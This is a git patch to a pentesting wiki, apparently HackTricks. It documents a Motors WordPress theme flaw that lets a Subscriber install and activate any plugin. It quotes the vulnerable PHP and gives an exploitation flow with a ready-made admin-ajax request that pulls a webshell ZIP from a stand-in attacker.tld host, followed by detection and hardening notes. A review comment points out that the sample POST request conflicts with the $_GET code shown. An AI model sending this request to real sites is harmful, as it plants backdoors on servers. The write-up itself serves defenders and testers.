From 1b6392ff53944dbc0f5128cc4b3065fddcad95d7 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 18 Dec 2025 12:43:31 +0000 Subject: [PATCH] Add content from: Critical Arbitrary File Upload Vulnerability in Motors Theme... --- src/SUMMARY.md | 1 + .../inputmethodservice-ime-abuse.md | 1 + .../pentesting-web/wordpress.md | 54 +++++++++++++++++++ 3 files changed, 56 insertions(+) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 727a26a3a9a..5c74e762cdf 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -372,6 +372,7 @@ - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md) - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md) - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md) + - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md) - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md) - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md) - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md) diff --git a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md index 878d498c40e..8251e907770 100644 --- a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md +++ b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md 
@@ -81,3 +81,4 @@ adb shell ime help - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices. - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI). +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index cf9b546a2f0..af2d5e1e8d9 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md 
@@ -862,6 +862,59 @@ Hardening - Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code - Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows +### Subscriber+ AJAX plugin installer → forced malicious activation (Motors Theme ≤ 5.6.81) + +[Patchstack's analysis](https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/) showed how the Motors theme ships an authenticated AJAX helper for installing its companion plugin: + +```php +add_action('wp_ajax_mvl_theme_install_base', 'mvl_theme_install_base'); + +function mvl_theme_install_base() { + check_ajax_referer('mvl_theme_install_base', 'nonce'); + + $plugin_url = sanitize_text_field($_GET['plugin']); + $plugin_slug = 'motors-car-dealership-classified-listings'; + + $upgrader = new Plugin_Upgrader(new Motors_Theme_Plugin_Upgrader_Skin(['plugin' => $plugin_slug])); + $upgrader->install($plugin_url); + mvl_theme_activate_plugin($plugin_slug); +} +``` + +- Only `check_ajax_referer()` is called; there is no `current_user_can('install_plugins')` or `current_user_can('activate_plugins')`. +- The nonce is embedded in the Motors admin page, so any Subscriber that can open `/wp-admin/` can copy it from the HTML/JS. +- The handler trusts the attacker-controlled `plugin` parameter (read from `$_GET`) and passes it into `Plugin_Upgrader::install()`, so an arbitrary remote ZIP is downloaded into `wp-content/plugins/`. +- After installation the theme unconditionally calls `mvl_theme_activate_plugin()`, guaranteeing execution of the attacker plugin's PHP code. + +#### Exploitation flow + +1. Register/compromise a low-privileged account (Subscriber is enough) and grab the `mvl_theme_install_base` nonce from the Motors dashboard UI. +2. 
Build a plugin ZIP whose top-level directory matches the expected slug `motors-car-dealership-classified-listings/` and embed a backdoor or webshell in the `*.php` entry points. +3. Host the ZIP and trigger the installer by pointing the handler to your URL: + +```http +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: victim.tld +Cookie: wordpress_logged_in_=... +Content-Type: application/x-www-form-urlencoded + +action=mvl_theme_install_base&nonce=&plugin=https%3A%2F%2Fattacker.tld%2Fmotors-car-dealership-classified-listings.zip +``` + +Because the handler reads `$_GET['plugin']`, the same payload can also be sent via the query string. + +#### Detection checklist + +- Search themes/plugins for `Plugin_Upgrader`, `Theme_Upgrader`, or custom `install_plugin.php` helpers wired to `wp_ajax_*` hooks without capability checks. +- Inspect any handler that takes a `plugin`, `package`, `source`, or `url` parameter and feeds it into upgrader APIs, especially when the slug is hard-coded but the ZIP contents are not validated. +- Review admin pages that expose nonces for installer actions—if Subscribers can load the page, assume the nonce leaks. + +#### Hardening + +- Gate installer AJAX callbacks with `current_user_can('install_plugins')` and `current_user_can('activate_plugins')` after nonce verification; Motors 5.6.82 introduced this check to patch the bug. +- Refuse untrusted URLs: limit installers to bundled ZIPs or trusted repositories, or enforce signed download manifests. +- Treat nonces strictly as CSRF tokens; they do not provide authorization and should never replace capability checks. + --- ## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1) 
@@ -931,5 +984,6 @@ Hardening - [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability) - [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability) - [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability) +- [Critical Arbitrary File Upload Vulnerability in Motors Theme Affecting 20k+ Sites](https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/) {{#include ../../banners/hacktricks-training.md}}
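Review bot: In the wordpress.md hunk (`@@ -862,6 +862,59 @@`) the sample request and the code excerpt disagree: the handler reads `$_GET['plugin']`, yet the example sends `action`, `nonce` and `plugin` in a POST body, which PHP does not expose through `$_GET`, so the sentence "the same payload can also be sent via the query string" has the relationship backwards unless the excerpt is abbreviated. Either put the parameters on the query string in the example or state which superglobal the shipped code actually uses; the same point affects the Detection checklist, since log or WAF rules that only inspect POST bodies for `action=mvl_theme_install_base` would miss query-string requests. Two smaller points: the sample leaves blank placeholders (`Cookie: wordpress_logged_in_=...` and `nonce=&plugin=`) that should be explicit, e.g. `nonce=<NONCE>`; and the Hardening list could note that the return value of `$upgrader->install()` is never checked before `mvl_theme_activate_plugin()` runs, so a failed or rejected download must not fall through to activation, while a runtime indicator (admin-ajax.php calls with `action=mvl_theme_install_base` from non-administrator accounts, plus new directories appearing under `wp-content/plugins/`) would round out the Detection checklist.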
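Review bot: The new reference entry in the `@@ -931,5 +984,6 @@` hunk breaks the list's `Product ≤ version – issue (source)` convention used by the three entries above it; for consistency consider `- [Motors Theme ≤ 5.6.81 – Subscriber+ arbitrary plugin installation and activation (Patchstack)](...)` with the same URL, so the version affected is visible in the list without opening the article.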